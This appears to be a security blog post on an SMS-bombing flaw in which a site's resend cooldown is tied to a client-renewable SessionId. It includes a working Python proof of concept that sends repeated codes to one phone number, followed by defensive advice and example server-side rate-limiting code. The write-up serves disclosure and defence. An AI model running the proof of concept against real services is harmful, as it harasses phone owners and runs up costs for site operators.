Defense Ideas for a Type of SMS Vulnerability
2022-07-30 06:35:00 【P4nic】
0x01 Vulnerability Verification:
Website functions that send SMS verification codes may have this kind of vulnerability,
for example account registration, password change, mobile-number binding and other important functions.
The login page is shown below; click "Forgot password".

The process of retrieving the password is as follows:

Check: after each verification code is sent, the page requires a 60 s wait before the next one can be requested.
Refresh the page and request the SMS again: the message is sent successfully.
Capturing the requests with Burp shows that the SessionId changes every time the page is refreshed, so the next step is to try replacing the SessionId.

Obtaining the SessionId
In the browser developer tools (F12) the SessionId can be found in the response body.

Regular expression to extract the SessionId:

```python
page_text = s.post(url=id_get_url, headers=headers, data=data).text
ex = 'SessionId"]="(.*?)";'
SessionId = re.findall(ex, page_text)[0]
```

Because the SessionId is tied to a cookie, the request to the second URL must also carry the cookie that was set when the SessionId was obtained from the first URL. Creating a Session object with requests.Session() makes this convenient: the cookie is stored and sent automatically.
The POC is as follows:
```python
import requests
import re
import time

for i in range(13):  # Send SMS 13 times
    # A fresh Session per iteration: new cookie, new SessionId, new cooldown
    s = requests.Session()
    headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Edg/98.0.1108.62",
    }
    # First request: the page whose response contains the SessionId
    id_get_url = "https://CanNotTellYou.com/test"
    data = {
        'tranFlag': 0,
        'netType': 7,
        'Language': 'zh_CN',
        'PlatFlag': 3,
        'ComputID': 10,
        'StructCode': 1,
        'customerGroup': 1010,
        'channelCode': 302,
        'User_browser': 'Chrome:98.0.4758.102',
        'User_os': 'Windows10',
    }
    page_text = s.post(url=id_get_url, headers=headers, data=data).text
    ex = 'SessionId"]="(.*?)";'
    SessionId = re.findall(ex, page_text)[0]
    # with open('./page_text.html', 'w', encoding='utf-8') as f:
    #     f.writelines(page_text)
    # Second request: trigger the SMS with the freshly obtained SessionId
    url = 'https://AgainNoTellYou.com/test'
    post_data = {
        'tranFlag': 1,
        'loginID': 12345678978,  # phone number
        'SessionId': SessionId,
        'tranCode': 'A00012',
        'StructCode': 1,
    }
    response = s.post(url=url, headers=headers, data=post_data)
    print(response.text)
    time.sleep(2)
```

The verification results are as follows:

0x02 Vulnerability Harm:
- From the company's perspective:
Every SMS verification code sent costs the company a fee from the SMS provider. A single message may cost only a few cents, but if the site has this flaw and someone with bad intentions exploits it to send messages in bulk, the losses can be large.
- From the user's perspective:
Users of the site (or anyone whose number is entered) are harassed with unwanted messages.
0x03 Defensive Ideas:
In the example above there is a limit on the total number of SMS each number can receive per day, but the interval between sends is tracked only by SessionId, which the client can renew at will simply by refreshing the page. More reasonable approaches:
- Keep a timer per phone number on the back end, and refuse to resend within the specified interval.
- Limit the number and frequency of POST submissions per minute from the same IP address.
- Require a correct image/text CAPTCHA on every SMS request.
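The following is an added example, not code from the original site or this post, showing the three defenses above as a server-side check and contrasting it with the SessionId-keyed cooldown the PoC defeats. Class names, limits (60 s cooldown, 10 per day, 5 requests per IP per minute), the phone number and the IP address are all constructed for illustration; a real deployment would keep the counters in a shared store such as Redis rather than in process memory.

```python
import time
from collections import defaultdict, deque

# All values below are constructed for this example; they are not the real site's settings.
RESEND_INTERVAL = 60          # seconds a number must wait between two codes
DAILY_LIMIT_PER_NUMBER = 10   # codes one number may receive per day
IP_WINDOW = 60                # sliding window (seconds) for the per-IP limit
IP_LIMIT = 5                  # send requests one IP may make per window


class SessionKeyedGuard:
    """The weak pattern from the post: the cooldown is keyed on the
    client-supplied SessionId, so a fresh SessionId resets the timer."""

    def __init__(self, now=time.time):
        self.now = now
        self.last_sent = {}   # session_id -> timestamp of last send

    def check(self, phone, ip, session_id, captcha_ok):
        t = self.now()
        last = self.last_sent.get(session_id)
        if last is not None and t - last < RESEND_INTERVAL:
            return False, "cooldown"
        self.last_sent[session_id] = t
        return True, "sent"


class SmsSendGuard:
    """Hardened decision: every limit is keyed on something the client
    cannot freely change (the target number, the source IP) and a
    CAPTCHA is required on every request."""

    def __init__(self, now=time.time):
        self.now = now
        self.last_sent = {}                   # phone -> timestamp of last send
        self.daily_count = defaultdict(int)   # phone -> sends today (daily reset job omitted)
        self.ip_hits = defaultdict(deque)     # ip -> timestamps of recent requests

    def check(self, phone, ip, session_id, captcha_ok):
        # session_id is deliberately ignored: it must not influence rate limiting.
        t = self.now()
        if not captcha_ok:
            return False, "captcha"
        # Per-IP frequency limit over a sliding window. Attempts are counted,
        # not only successful sends, so hammering the endpoint is itself throttled.
        hits = self.ip_hits[ip]
        while hits and t - hits[0] > IP_WINDOW:
            hits.popleft()
        if len(hits) >= IP_LIMIT:
            return False, "ip_rate"
        hits.append(t)
        # Per-number cooldown and daily cap, keyed on the phone number only.
        last = self.last_sent.get(phone)
        if last is not None and t - last < RESEND_INTERVAL:
            return False, "cooldown"
        if self.daily_count[phone] >= DAILY_LIMIT_PER_NUMBER:
            return False, "daily_limit"
        self.last_sent[phone] = t
        self.daily_count[phone] += 1
        return True, "sent"


class FakeClock:
    """Controllable clock so the simulation runs instantly and deterministically."""

    def __init__(self, start=1_000_000.0):
        self.t = start

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def simulate_bombing(guard, clock, attempts=13, pause=2):
    """Replay the PoC's loop: same number, same source IP, a fresh SessionId on
    every request, 2 s between requests. Returns how many SMS would go out."""
    sent = 0
    for i in range(attempts):
        ok, _reason = guard.check(phone="12345678978", ip="203.0.113.5",
                                  session_id=f"sess-{i}", captcha_ok=True)
        sent += ok
        clock.advance(pause)
    return sent


def demo():
    """Returns (sends allowed by the SessionId-keyed guard, sends allowed by the hardened guard)."""
    weak_clock = FakeClock()
    weak = simulate_bombing(SessionKeyedGuard(now=weak_clock), weak_clock)
    hard_clock = FakeClock()
    hard = simulate_bombing(SmsSendGuard(now=hard_clock), hard_clock)
    return weak, hard


if __name__ == "__main__":
    print(demo())  # (13, 1)
```

Against the PoC's 13 requests, the SessionId-keyed guard lets all 13 messages out, while the hardened guard sends one, rejects the next four on the per-number cooldown, and rejects the rest on the per-IP limit. The per-IP limit is a backstop rather than the primary control, since an attacker can rotate source addresses; the per-number cooldown and daily cap are what protect the victim's phone and the SMS budget.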